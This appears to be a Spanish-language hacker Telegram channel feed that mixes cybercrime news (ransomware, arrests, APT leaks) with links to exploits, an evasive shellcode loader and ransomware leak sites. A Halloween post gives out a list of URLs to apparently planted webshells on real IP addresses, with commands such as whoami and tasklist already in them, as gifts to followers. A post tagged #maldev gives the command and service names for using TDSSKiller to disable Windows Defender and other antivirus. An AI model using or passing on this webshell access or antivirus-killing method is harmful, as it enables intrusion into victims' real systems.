🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
Scattered LAPSUS$ lanza sitio web de venta con datos de empresas multinacionales 📁☠️ Scattered LAPSUS$ a vuelto despues de que algunos miembros importante del grupo fueran arrestados por las fuerzas del orden y después de que sus canales de Telegram fueran…
No han pasado ni un mes y el sitio de filtración de los chicos de Scattered a sido confiscado por el FBI 🚨
😁8🔥4
Embaja boliviana en EEUU golpeada por DEVMAN Ransomware 🇧🇴🔐
Un grupo de Ransomware relativamente nuevo dentro de la escena llamada DEVMAN se encuentra golpeando casi a diario a empresas y gobiernos al rededor del mundo, en esta ocasión su nueva victima es la Embaja de Bolivia en DC , EEUU, del cual lograron exfiltrar 400GB de datos segun el Blog de victimas del grupo.
DEVMAN nació de un afiliado de Qilin Ransomware el cual quiso formar su propia pandilla de Ransomware usando el código fuente filtrado de DragonForce Ransomware y creando una variante solida, actualmente su Blog de victimas cuanta con mas de una docena de victimas, entre las cuales figuran el Gobierno del Estado de Colima Mexico y El Ministerio de Electricidad de Egipto.
http://devmanblggk7ddrtqj3tsocnayow3bwnozab2s4yhv4shpv6ueitjzid.onion/
#ransomware #devman #onion #bolivia #fuckgob
Un grupo de Ransomware relativamente nuevo dentro de la escena llamada DEVMAN se encuentra golpeando casi a diario a empresas y gobiernos al rededor del mundo, en esta ocasión su nueva victima es la Embaja de Bolivia en DC , EEUU, del cual lograron exfiltrar 400GB de datos segun el Blog de victimas del grupo.
DEVMAN nació de un afiliado de Qilin Ransomware el cual quiso formar su propia pandilla de Ransomware usando el código fuente filtrado de DragonForce Ransomware y creando una variante solida, actualmente su Blog de victimas cuanta con mas de una docena de victimas, entre las cuales figuran el Gobierno del Estado de Colima Mexico y El Ministerio de Electricidad de Egipto.
http://devmanblggk7ddrtqj3tsocnayow3bwnozab2s4yhv4shpv6ueitjzid.onion/
#ransomware #devman #onion #bolivia #fuckgob
👏2😱2
Lanzamiento de RaaS de Devman: el afiliado que aspira a convertirse en el jefe 🔐
https://analyst1.com/devmans-raas-launch-the-affiliate-who-aims-to-become-the-boss/
#articulo #ransomware #devman
https://analyst1.com/devmans-raas-launch-the-affiliate-who-aims-to-become-the-boss/
#articulo #ransomware #devman
Analyst1
Devman's RaaS Launch: The Affiliate Who Aims to Become the Boss
Jon DiMaggio interviews the new affiliate who aims to be the boss: Devman. Dive into the exploration of this new syndicate now.
❤4
Media is too big
VIEW IN TELEGRAM
Autoridades europeas desmantelan una red que vendia numeros de SIM y SIM Box en mas de 80 paises. Los agentes también confiscaron cinco servidores, 40.000 tarjetas SIM activas y 1.200 dispositivos SIM box, que permiten a los delincuentes explotar redes móviles insertando y utilizando cientos de tarjetas simultáneamente.
Según Europol, la plataforma en línea de la red permitía a los delincuentes alquilar números de teléfono y utilizarlos para abrir cuentas falsas en redes sociales y plataformas de mensajería.
#video #europol #busted
Según Europol, la plataforma en línea de la red permitía a los delincuentes alquilar números de teléfono y utilizarlos para abrir cuentas falsas en redes sociales y plataformas de mensajería.
#video #europol #busted
🔥6😭5❤2
Exploit for CVE-2025-11001 or CVE-2025-11002 💣
https://github.com/pacbypass/CVE-2025-11001/tree/main
#exploit #7zip #cve
https://github.com/pacbypass/CVE-2025-11001/tree/main
#exploit #7zip #cve
GitHub
GitHub - pacbypass/CVE-2025-11001: Exploit for CVE-2025-11001 or CVE-2025-11002
Exploit for CVE-2025-11001 or CVE-2025-11002. Contribute to pacbypass/CVE-2025-11001 development by creating an account on GitHub.
🔥8❤1
China acusa a la NSA de piratear su Centro Nacional de Servicios del Tiempo 🇨🇳🇺🇸
El Ministerio de Seguridad del Estado de China acusa a la NSA de llevar acabo ciberataques premeditados y altamente sofisticados contra sus sistemas en cargados de generar, mantener y transmitir el estándar nacional de tiempo (NTSC).
Según una investigacion llevada acabo por investigadores chinos revela que la NSA uso un Exploit para una aplicación de Chat el cual no se menciona en la publicación, para robar credenciales de varios trabajadores y posterior realizar movimiento lateral sobre las redes del Centro Nacional de Servicios del Tiempo (NTSC), los ataques se realizaban durante altas hora de la noche (Hora Beijing) desde servidores VPS desde distintas ubicaciones como ser: Europa, EEUU y Asia.
https://thehackernews.com/2025/10/mss-claims-nsa-used-42-cyber-tools-in.html
#china #eeuu #apt
El Ministerio de Seguridad del Estado de China acusa a la NSA de llevar acabo ciberataques premeditados y altamente sofisticados contra sus sistemas en cargados de generar, mantener y transmitir el estándar nacional de tiempo (NTSC).
Según una investigacion llevada acabo por investigadores chinos revela que la NSA uso un Exploit para una aplicación de Chat el cual no se menciona en la publicación, para robar credenciales de varios trabajadores y posterior realizar movimiento lateral sobre las redes del Centro Nacional de Servicios del Tiempo (NTSC), los ataques se realizaban durante altas hora de la noche (Hora Beijing) desde servidores VPS desde distintas ubicaciones como ser: Europa, EEUU y Asia.
https://thehackernews.com/2025/10/mss-claims-nsa-used-42-cyber-tools-in.html
#china #eeuu #apt
🔥8🤯3❤1
https://es.wired.com/articulos/satelites-sin-cifrado-exponen-secretos-de-la-guardia-nacional-cfe-telmex-y-el-mundo-una-antena-barata-basto-para-saberlo
#articulo
#articulo
WIRED
Satélites sin cifrado exponen secretos de la Guardia Nacional, CFE, Telmex y el mundo. Una antena barata bastó para saberlo
Utilizando solo 800 dólares en equipos comerciales, los investigadores descubrieron que una cantidad asombrosa de datos sensibles se transmiten por satélite completamente sin cifrar.
🔥7😱1
Alguien a creado un sitio Web en donde muestran información de desarrolladores de Lumma Stealer 🔑
Al parecer alguien descontento muy cercano al grupo de Malware como Servicio (MaaS) Lumar a Doxxeado a varios miembros del grupo, exponiendo números de telefonos y perfiles de redes sociales de varios individuos.
https://lummakrysy.rip/
#lummar #dox #hacking #rusia
Al parecer alguien descontento muy cercano al grupo de Malware como Servicio (MaaS) Lumar a Doxxeado a varios miembros del grupo, exponiendo números de telefonos y perfiles de redes sociales de varios individuos.
https://lummakrysy.rip/
#lummar #dox #hacking #rusia
😁12🤣3
This media is not supported in your browser
VIEW IN TELEGRAM
Dynamic shellcode loader with sophisticated evasion capabilities
https://github.com/0xNinjaCyclone/AsmLdr
#bypassav #github
https://github.com/0xNinjaCyclone/AsmLdr
#bypassav #github
🔥5❤2
Una mirada profunda a la filtraciones del APT Irani APT35 (Charming Kitten) 🇮🇷
El mes pasado salio a la luz una importante filtración de herramientas y documentos interno del grupo de HAckers respaldado por el gobierno Irani Charming Kitten, los ficheros se encuentran en un repositorio en Github en donde varios investigadores han logrado sacar mucha información sobre como esta estructurado este grupo de Hackers.
https://www.cloudsek.com/blog/an-insider-look-at-the-irgc-linked-apt35-operations
GITHUB:
https://github.com/KittenBusters/CharmingKitten/
#leaks #apt #github
El mes pasado salio a la luz una importante filtración de herramientas y documentos interno del grupo de HAckers respaldado por el gobierno Irani Charming Kitten, los ficheros se encuentran en un repositorio en Github en donde varios investigadores han logrado sacar mucha información sobre como esta estructurado este grupo de Hackers.
https://www.cloudsek.com/blog/an-insider-look-at-the-irgc-linked-apt35-operations
GITHUB:
https://github.com/KittenBusters/CharmingKitten/
#leaks #apt #github
Cloudsek
An Insider Look At The IRGC-linked APT35 Operations: Ep1 & Ep2 | CloudSEK
CloudSEK’s TRIAD team analyzed leaked internal documents from Iran-linked APT35 (Charming Kitten), revealing its structure, tools, and espionage operations. The group—tied to the IRGC—targeted government, legal, energy, and financial sectors across the Middle…
❤4🔥2👎1
https://www.elconfidencial.com/empleo/2025-10-28/drones-hackers-virus-informaticos-busca-talento-joven_4236824/
#articulo #españa #hackers
#articulo #españa #hackers
elconfidencial.com
Drones, hackers, virus informáticos... Defensa busca talento joven para la guerra cibernética
La demanda de profesionales en este sector supera la oferta este año. En nuestro país, se requieren ya casi 100.000 profesionales para cubrir la demanda de talento, lo que significa una subida del 20% en relación con 2024
🔥8
Media is too big
VIEW IN TELEGRAM
Autoridades rusas arresta a 3 desarrolladores del Malware Meduza Stealer 🇷🇺🚨
En un operativo sorpresa la policía rusa a interrumpidos en domicilios de 3 miembros clave del grupo de desarrolladores del Stealer Meduza, según medios locales los arrestados son jóvenes expertos en IT y son los encargados de crear y distribuir el Malware por distintos foros y canales de Telegram.
Las detenciones de Hackers rusos en territorio ruso es muy rara ya que este pais es considerado un refugio para los piratas informáticos, esta detención se debe a que el Malware Meduza fue utilizado para atacar a una organización de una region rusa.
De ser declarados culpables los los 3 detenidos pueden pasar hasta 4 años en prisión.
FUENTE:
https://news.1rj.ru/str/IrinaVolk_MVD/5661
#rusia #malware #busted #arrestado #hacker #meduza #stealer
En un operativo sorpresa la policía rusa a interrumpidos en domicilios de 3 miembros clave del grupo de desarrolladores del Stealer Meduza, según medios locales los arrestados son jóvenes expertos en IT y son los encargados de crear y distribuir el Malware por distintos foros y canales de Telegram.
Las detenciones de Hackers rusos en territorio ruso es muy rara ya que este pais es considerado un refugio para los piratas informáticos, esta detención se debe a que el Malware Meduza fue utilizado para atacar a una organización de una region rusa.
De ser declarados culpables los los 3 detenidos pueden pasar hasta 4 años en prisión.
FUENTE:
https://news.1rj.ru/str/IrinaVolk_MVD/5661
#rusia #malware #busted #arrestado #hacker #meduza #stealer
😱7🔥4
/}
_,---~-LJ,-~-._
,-^ ' ' ' ^:,
: . ' ' :
: /| . /\ ' :
: . //| // \ ' :
: `~` /| `^~` ' ;
: ' //| ' :
: \-_ `~` , ' :
; . \.\_,--,_;^/ , :
: ^-_!^!__/^ , :
:, , . , : -HAPPY HALLOWEEN-
^--_____ . ;` 2025
`^''----`
🎃COMO YA ES TRADICIONAL EN FSEC CADA HALLOWEEN SE REGALA A LOS
FIELES SEGUIDORES ALGUNOS DULCES 🍬 🍭
http://181.13.175.66:50000/irj/bvpnqvnv.jsp?cmd=tasklist
http://179.50.23.109:50000/irj/ygqlsxad.jsp?cmd=tasklist
http://201.217.223.147:50000/irj/ndrwodyt.jsp?cmd=whoami (Linux)
http://186.147.143.210:50000/irj/liqwsjss.jsp?cmd=arp%20-a
https://179.50.81.123/irj/anlrqipw.jsp?cmd=dir
https://186.147.143.203/irj/nhnrxkfs.jsp
https://200.3.166.67//irj/mqreovyt.jsp?cmd=ls (linux)
https://200.85.234.131/irj/vwcsmtgf.jsp?cmd=ls (Linux)
https://200.85.234.133/irj/jdbueorq.jsp (Linux)
http://190.96.113.62:50000/irj/ldcbainy.jsp?cmd=ls%20/tmp (Linux)
http://200.80.201.170:50000/irj/cqgbtqoy.jsp?cmd=whoami (Linux)
💀¡HAPPY HALLOWEEN HAXXORS!🕷
🎃17🔥6😁3❤2😱2👻1🦄1
Según informes recientes cibercriminales rusos se encuentran usando amplimamente el C2 de codigo abierto AdaptixC2. 🇷🇺
Segun un informe de la empresa Silent Push, el submundo cibercriminal ruso se encuentra migrando de Cobalt Strike a AdaptixC2, afiliados de Akira Ransomware han añadido a Adaptix a su arsenal de herramientas.
También se ha observado que el fundador y desarrollador principal del proyecto es de origen ruso y opera un canal en Telegram en el cual tiene una comunidad muy activa en donde sugieren nuevas mejoras y realizan seguimientos de nuevas implementaciones del proyecto Adaptix, si bien no sea llegado a confirmar que el fundador del proyecto llamado RalfHacker tenga vínculos cercanos con cibercriminales se sabe que ha estado metido en el submundo cibercriminal desde hace tiempo.
FUENTE:
https://www.silentpush.com/blog/adaptix-c2/
https://thehackernews.com/2025/10/russian-ransomware-gangs-weaponize-open.html
Segun un informe de la empresa Silent Push, el submundo cibercriminal ruso se encuentra migrando de Cobalt Strike a AdaptixC2, afiliados de Akira Ransomware han añadido a Adaptix a su arsenal de herramientas.
También se ha observado que el fundador y desarrollador principal del proyecto es de origen ruso y opera un canal en Telegram en el cual tiene una comunidad muy activa en donde sugieren nuevas mejoras y realizan seguimientos de nuevas implementaciones del proyecto Adaptix, si bien no sea llegado a confirmar que el fundador del proyecto llamado RalfHacker tenga vínculos cercanos con cibercriminales se sabe que ha estado metido en el submundo cibercriminal desde hace tiempo.
FUENTE:
https://www.silentpush.com/blog/adaptix-c2/
https://thehackernews.com/2025/10/russian-ransomware-gangs-weaponize-open.html
❤5👍1
Usando herramienta legitima para remover Software antivirus y Window Defender 🛡👾
Para remover el Software Antivirus vamos a usar una herramienta de Kaspersky llamada TDSSKiller usado para remover Malware del sistema, pero en esta ocasión sera usado para remover el Window defender de nuestro sistema.
🎯 Nombres de servicios a matar:
🎯 Usando herramienta:
Descarga de herramienta:
http://web.archive.org/web/20230606061811/https://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe
#maldev #windef #manual
Para remover el Software Antivirus vamos a usar una herramienta de Kaspersky llamada TDSSKiller usado para remover Malware del sistema, pero en esta ocasión sera usado para remover el Window defender de nuestro sistema.
🎯 Nombres de servicios a matar:
Windows Defender - windefend
Malwarebytes - MBAMService
Kaspersky - AVP21.3
🎯 Usando herramienta:
TDSSKiller.exe -accepteula -silent -dcsvc <nombre servicio>
Descarga de herramienta:
http://web.archive.org/web/20230606061811/https://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe
#maldev #windef #manual
❤14
WARLOCK Ransomware 🔐
http://warlockhga5iw3t54ps5iytlilf7hlvxy7kwrkidspn4qoh64s4vsuyd.onion/
#ransomware #warlock #onion
http://warlockhga5iw3t54ps5iytlilf7hlvxy7kwrkidspn4qoh64s4vsuyd.onion/
#ransomware #warlock #onion
🔥3